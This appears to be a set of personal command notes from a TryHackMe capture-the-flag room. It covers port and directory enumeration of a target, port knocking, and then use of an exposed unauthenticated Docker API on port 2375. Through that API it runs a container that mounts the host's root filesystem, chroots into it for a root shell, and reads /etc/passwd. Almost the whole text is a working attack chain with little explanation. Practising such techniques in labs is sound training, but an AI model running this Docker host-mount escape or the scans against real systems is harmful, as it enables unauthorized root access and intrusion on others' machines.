nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster -e dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard
Had to add .well-known to the wordlist, wasn't in any of Tryhackme's default wordlists
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirb/common.txt --wildcard -s"204,301,302,307,401,403"
None of this was working, try later.
dirb http://$VICTIM/.well-known -X .txt
curl http://$VICTIM/.well-known/security.txt
curl http://$VICTIM/api/fl46
curl http://$VICTIM/robots.txt
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
nmap $VICTIM -p 2375
subl /etc/docker/daemon.json
{
"insecure-registries" : ["10.10.90.88:2375"]
}
sudo systemctl stop docker
sudo systemctl start docker
docker -H $VICTIM:2375 images
docker -H $VICTIM:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
cat /etc/passwd